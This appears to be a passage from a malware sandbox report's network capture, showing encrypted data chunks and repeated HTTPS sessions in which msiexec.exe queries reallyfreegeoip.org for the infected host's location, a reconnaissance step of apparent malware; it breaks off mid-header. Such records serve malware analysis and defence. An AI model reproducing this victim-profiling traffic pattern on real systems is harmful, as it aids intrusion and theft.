2025-02-19 10:43:21 UTC	1390	IN	Data Raw: dd a3 39 56 e7 2e 37 56 bf 06 a3 ca ec 67 2d d6 40 84 7a 99 c7 a1 eb 8a c1 ad 85 19 5e 0b 61 45 79 4c 07 ac d7 00 97 1c 0f 3b cb da 92 73 72 e8 c6 78 db 6d e4 5e c3 ec 0d 29 d0 6e 1d fc bd 6a ac 78 68 ff 4d c8 24 c4 e2 2d da ca 37 ab 1b be 62 1f 5e 28 68 55 91 c1 10 08 e4 4b bf 48 d3 fd 94 49 0c d4 18 bb 04 da ec 9b b9 28 41 9f f7 46 21 22 06 53 37 65 76 ae 3f e0 ef 02 e1 93 bc df c4 64 e2 7b c7 23 ba 57 75 ef 22 92 dc 5b d2 a3 33 cf 3f 36 c5 03 d1 bd 9c 9e 02 cb 3f 5c c8 fb 86 e7 8f a2 5d fd 8a 02 4d 6a db f2 1f a7 4a 75 5a 65 ac 3f 4e 54 66 ae 43 e9 3a 6f d9 7c 3c dc 52 d2 ba c1 5f 6c 20 3d 14 79 76 d7 de fc 6d e6 b2 10 49 2e 96 83 47 c5 7e db bc ec 84 80 80 ab 0c 11 21 62 fd 1a d0 da 56 29 cf c0 c5 21 d8 a9 42 a1 37 ab 7e 3e 36 49 dd f4 ad da 6d 25 72 Data Ascii: 9V.7Vg-@z^aEyL;srxm^)njxhM$-7b^(hUKHI(AF!"S7ev?d{#Wu"[3?6?\]MjJuZe?NTfC:o\|<R_l =yvmI.G~!bV)!B7~>6Im%r
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: 95 e5 ca 45 33 03 32 24 74 b2 af 3f ea f9 e8 1e 86 a1 ce e4 5b 5f 18 c7 23 98 25 11 ef 28 85 51 69 10 a3 32 e0 3a 42 ab 0a af f7 3e bb 11 90 4a 5c c8 fb 4b 06 97 d0 ce f2 9b 74 80 8a c2 8c 2d d9 77 71 f8 44 d9 8b f3 5b 6c de f0 ca 53 b4 e3 7c 4c f0 46 f7 a6 b9 e6 d8 30 4d c6 79 5a d7 de fc 6d 7d b2 10 49 3d a6 9e d1 09 3f db bd c8 b7 e4 2b 7e 1f 61 f3 e5 cf 25 4e 6c 56 23 67 47 f8 4b 33 3f 4d d1 e5 2c 42 59 70 71 dd f0 0b 5d 52 4d 2d 40 35 26 ae 1f e7 f2 d1 5e 1d 4b d8 82 4e 08 f8 9f 93 17 01 5b c1 d0 3b 6d 68 fe 84 21 06 d1 52 ba 00 a0 56 87 8d 1d fc b4 58 d9 55 7d d8 61 45 a8 c4 24 cc c1 88 6c c3 de c5 19 1a 10 b8 83 73 cd 8b 1c 60 d0 e4 c6 c0 6e 1c d4 ce 18 b6 4a f6 cf 04 21 cd 5a 42 1d f3 9b 19 b9 e6 03 5c 9b b3 0f f6 83 ac a4 93 61 d0 e4 10 20 48 f7 Data Ascii: E32$t?[_#%(Qi2:B>J\Kt-wqD[lS\|LF0MyZm}I=?+~a%NlV#gGK3?M,BYpq]RM-@5&^KN[;mh!RVXU}aE$ls`nJ!ZB\a H
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: ba e5 94 da 3b b9 0c 6b 83 6d ea 33 76 da 56 22 6d e4 dd da df a6 4e 5b 95 8e 67 53 3e 4d dd ac 0f ff 77 48 5f a3 34 26 c3 30 8e 85 d1 5f 32 32 62 83 5b 02 88 43 9d 00 29 e9 b2 3d 31 cf 47 f5 f1 a9 0f be f3 18 25 b3 39 b8 e2 ce f8 16 77 c3 59 fc d7 61 31 79 28 3f b2 d7 9b 64 b9 80 2b 19 1e 68 7f a4 6f cf b0 20 e3 a0 46 e4 a1 90 1d cd cc 21 08 66 fa d4 0b 59 fe 90 42 17 f5 93 13 b9 ed 05 67 88 95 69 3c 55 ab ae 93 41 c1 ec 7f 1e 36 eb 29 99 bb 6c 8c ee 2d 01 8e f0 9f 3d b7 7c 8a 9d 22 60 b3 a3 48 7e c5 28 7c d2 cb 87 a4 f5 0f 0b 2a 40 c0 0c 81 02 de a2 0b 26 b4 7e 64 62 d6 1a d1 46 6a 5c c0 3f 3a 00 a0 4e 73 7f 39 e8 d9 0f 4b bd 5f 3d 90 0c bf 6e 5e 68 51 a7 b1 aa 6f ae 9e 1b 4b 08 80 00 14 cc 4a 20 2a ca a2 22 bf e5 ef 90 c7 df 9f 39 24 cf aa 9d f6 18 47 Data Ascii: ;km3vV"mN[gS>MwH_4&0_22b[C)=1G%9wYa1y(?d+ho F!fYBgi<UA6)l-=\|"`H~(\|@&~dbFj\?:Ns9K_=n^hQoKJ "9$G
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: 81 09 ef 13 09 bf 6c e9 c8 7e 1f b3 90 32 63 d4 9b 19 96 9f 2c 5c 93 d5 71 2a ab 79 ae 93 6b d2 fb 1c 5f 59 f7 59 b1 e9 03 62 e4 3e 13 ed b2 ec 95 c0 6a d2 71 f4 60 b9 bf b6 55 95 2e 45 6c dd 90 cb d7 3c 0b 20 57 ab 78 9b 70 23 a5 23 d5 db a9 6e 74 22 1b cb 59 42 61 4f 56 50 7b a8 18 73 75 38 d1 ec 60 92 b7 2d 6a 93 16 de 63 c2 72 47 b6 a9 01 10 bf 84 1b 4b 06 a8 15 0e a3 e0 4f 91 c0 a2 39 d5 87 20 90 b7 fd d7 22 35 de bb ad f6 18 49 28 5d 4b 05 e1 ed 6e 0c 28 7a e8 1f 1f 24 a6 05 97 74 1a d5 05 4a be c1 a8 9e b2 2f b3 60 21 25 00 02 7f f3 65 16 a3 c3 17 fe af 52 7c 64 3f e7 2e 83 b6 b1 ed e0 02 70 c2 4d c8 17 40 ad b1 45 66 4c a8 4c 22 fd d2 00 36 ea b2 3a f0 05 4b 0a 69 53 3c 38 cb 1f 27 2e 60 0b 98 f6 d3 4a 69 26 d6 40 73 9d 3d 47 ae f4 d4 7e 25 34 d6 Data Ascii: l~2c,\q*yk_YYb>jq`U.El< Wxp##nt"YBaOVP{su8`-jcrGKO9 "5I(]Kn(z$tJ/`!%eR\|d?.pM@EfLL"6:KiS<8'.`Ji&@s=G~%4
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: c7 7f 45 8f 0c 8f 79 da ae 9f 4b 0c a9 0f 14 cb 3e d4 81 ca d2 47 70 e8 fa 9a b7 f0 ba 7b 24 c5 d0 a8 b5 18 43 3f 34 e4 1f 92 4c 01 b3 22 69 fe 0e 2b 11 db 05 9d 63 84 89 14 56 d0 49 be ec 99 39 a2 0a ec ac 17 2a c3 f3 74 07 6e 3d 0f 8c 3c 5d 7c 2c 5e c2 37 fd 8e b1 fb cc d8 55 d8 35 e5 34 40 d1 13 60 55 4b 88 4c 28 f9 6c a8 6b 98 9f 2d d5 63 9b fa 15 53 4c 1a e6 43 27 28 c8 22 88 80 18 23 03 4d b4 65 6b e5 ec 56 a9 eb 3d 3f 25 3e dd 52 e7 7e ba af 89 70 a7 08 30 7a e4 18 30 f6 8c 92 a5 98 e3 85 63 86 0f d9 4a 2e 44 29 b3 70 8e 12 f9 c1 3a c7 0c a5 fa be 10 6a 6d 77 67 5b 35 d1 bb cb 2f 6f 32 0e bb 85 d2 7d 83 d4 de 5a 0e 16 9c 26 a6 61 b5 4d c2 61 51 7a ff a9 a8 14 f3 12 03 d0 c0 29 35 62 26 05 fc 18 e3 e5 06 a3 29 b5 46 12 f9 98 5e 2f ad 2e 49 4d 66 3d Data Ascii: EyK>Gp{$C?4L"i+cVI9*tn=<]\|,^7U54@`UKL(lk-cSLC'("#MekV=?%>R~p0z0cJ.D)p:jmwg[5/o2}Z&aMaQz)5b&)F^/.IMf=
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: 60 c2 04 3b d5 19 9b f7 7a 21 a7 06 89 6f 85 0d db 06 39 88 96 40 cb 07 6e 17 32 fd ec 26 0c ac 8b 3f 25 3e 72 73 98 68 b2 2b f3 00 8b 2d 27 70 94 6f 40 5a 8c 96 87 d1 3d 89 69 fd 8e cc 43 31 6d 6a b3 7a 88 df 38 c3 0a c7 7d a5 fa b2 03 b3 18 5e 05 5b 10 f3 52 a4 29 65 21 2e bb ad ce 4f 83 de 04 28 6b 14 9c 56 ce 7d 36 4d c6 19 22 86 fe ca bb 2d 75 2b d5 d8 d6 d7 4a 5e 07 14 d9 53 12 e7 06 d3 17 c7 c5 12 f3 8f c5 90 ac 3d 4e 79 76 76 a6 bc 2d 66 cd db 04 01 52 a9 3b c7 68 5e 29 2a 4c 38 0c 27 bb dd 8c 69 37 b0 de a1 5f 89 aa a4 0d 3e ec 0d d5 e6 51 c6 25 04 9c 0a 30 d8 65 bf 4e 23 f0 e4 73 42 55 38 40 2e 2d b4 7a 5f ff 37 99 6f 38 59 6d f7 89 17 55 52 89 05 9a 49 1e a4 8b bf 5e 94 90 5f ec 6a 94 72 90 21 04 d4 8d ae 0f 5d 8e b0 be 23 29 40 b1 b3 09 ef e9 Data Ascii: `;z!o9@n2&?%>rsh+-'po@Z=iC1mjz8}^[R)e!.O(kV}6M"-u+J^S=Nyvv-fR;h^)*L8'i7_>Q%0eN#sBU8@.-z_7o8YmURI^_jr!]#)@
2025-02-19 10:43:21 UTC	1390	IN	Data Raw: 19 fc 94 fe ca 85 5e f6 2b df bd 07 29 4b 47 26 14 f4 18 fd f1 06 a3 17 2b c5 12 f3 e0 11 c3 ac 4d 67 07 60 04 8d c5 e5 16 6f f4 13 01 90 a9 3b cb d9 76 19 2d d5 37 0a 44 17 e9 98 64 df b0 de af ee a3 a1 d8 53 ed ec 7d 7d d0 5a a9 09 6b 4d 0e 92 f7 68 c2 11 f8 e6 94 a1 14 3d 38 40 20 6a a1 7a 5f ff 56 ba 65 b5 68 1e 25 88 32 49 4f 65 12 9a 33 bc 90 90 f8 39 94 90 5f 5f 5f fe e1 1f 2e 74 da 30 8b 16 27 9e f9 be 27 81 17 aa d0 24 9c 9a 4a 6a 9c 02 b2 5c a5 99 62 38 13 a4 04 50 3d 86 d4 fd b0 35 16 28 a4 63 bc 31 58 10 73 04 35 b8 e4 00 22 1f 77 3a 07 8c e8 25 72 a4 4b 13 74 15 ad 8c b5 67 6b 4b 24 89 05 e2 a4 56 aa 1b 11 e5 35 66 b9 48 99 35 d5 71 89 23 b2 db 9e 72 e5 4a ab c4 55 fb 5e fa 4b 56 84 6c 25 4e 95 18 a4 27 59 19 9b fe c6 89 88 46 d1 1d 9e fc 4c Data Ascii: ^+)KG&+Mg`o;v-7DdS}}ZkMh=8@ jz_Veh%2IOe39___.t0''$Jj\b8P=5(c1Xs5"w:%rKtgkK$V5fH5q#rJU^KVl%N'YFL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49843	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:24 UTC	858	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193573 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3tPF1XEm6leFDGvVmf3JodG0WwmiIBFHZU6%2B0qWYUyv5qW%2FkhQxLbfDAAIljiyYPj1%2FqkSl6P%2BIjoiw5SWUtd7hSWM%2FwVsBLd0sIXFApY3FmCilUeLzdehF3RTNALFJwTGxvqe1B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a7e06ed941ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1638&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1723730&cwnd=198&unsent_bytes=0&cid=b0a43ea6a0a4120e&ts=145&x=0"
2025-02-19 10:43:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49853	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-19 10:43:25 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193574 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0gpcXxsdod5cWkP8p9BCAtWtU923NYzV7ECvItONyER0gZZ%2FVV3kCc0AsF6%2BzEEQoXTkyHbyFe2WM3Lna61LbSMtlPzNqXItbNc3Ru9p3AUMDcdjBSleubH1ZfJpU6%2FPo656VRB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a7e62a2b0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1439&min_rtt=1430&rtt_var=555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1940199&cwnd=216&unsent_bytes=0&cid=e867f42b8fa5840d&ts=148&x=0"
2025-02-19 10:43:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49861	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:26 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193575 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOZ1HPNaZfEFBMliDzzpf388P7QjwmYN6Re90aJFk%2FNCmNpR5Xey%2FqgOTLPjO27coz2STbNNaKdSQQGfU0Kj%2BCYhQT4QJ111DuEXx0qzbR5j67105bhp4zBvVJCHaCxEi5EwUeGe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a7ecefb20fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1474&rtt_var=578&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1853968&cwnd=216&unsent_bytes=0&cid=0202ba559943e5cb&ts=140&x=0"
2025-02-19 10:43:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49868	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-02-19 10:43:28 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193576 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5qPe8mklBPTYRTmUxyOWXyrG%2F7xjg4SAx6vMJM063AMYfTbbxIjRsDEaPmlok3BZVwjFEQrTK3XBfxUE0NiHjE3Iik8UOeBsmPk5TKWCRINbj%2BnjDof3ZH%2FiODLC%2BBT7v3QYBNEb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a7f3bc9b0fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1484&rtt_var=561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1944074&cwnd=216&unsent_bytes=0&cid=f2a0e2a05d8f813a&ts=141&x=0"
2025-02-19 10:43:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49880	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:29 UTC	850	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193578 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oxPVKmTXw2ZSqfLwj1G6XOJEo3epKC6Ax6MI0WNQDpfZmSf6wZlLGJZiyLY5w6FZ3IcIjPoIvqIxMYtJtltz6DN5KcoDc1mjOQ8p2iK9Eq%2FS4HtMAW7RqhxNGH7O3tEJlurJEYQo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a7fd69c51899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1644&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1657207&cwnd=187&unsent_bytes=0&cid=814513ac16ad187d&ts=156&x=0"
2025-02-19 10:43:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49907	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:33 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193581 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6PDd60QFYZdQabLkOeiQZEKYT0Y3Ncyde4Kb4tIE6wDTNPktqVkaLRAC51US76Tmnqzy0Eo1R4HltP3Pp6ltr9rUa71Tc0kaw3eAM9NVJ6kGEAHLsCxjE8FN%2BRdH%2F5lE5oXcmUGT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a8135c2e1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1640&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1714621&cwnd=187&unsent_bytes=0&cid=b48e34bc95e956bf&ts=141&x=0"
2025-02-19 10:43:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49943	104.21.16.1	443	6404	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-19 10:43:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-19 10:43:38 UTC	862	IN	HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 10:43:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 193586 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 17 Feb 2025 04:57:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LpxcCINe47XQn%2BnS3r%2FwXYo%2FFgDiZPBtb47PNrNRj9drZWEInfX%2Bx1yAnOX97uquVraIcnOVB465HhkjEDmj6JIgNjWB%2FtcUC1Im5%2BwA%2Fssx5cfp5qUzgqzwvNo1TdPZPtXxWwbA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9145a832dc354388-EWR alt-svc: h3=":443"; ma=86400 server-timing: 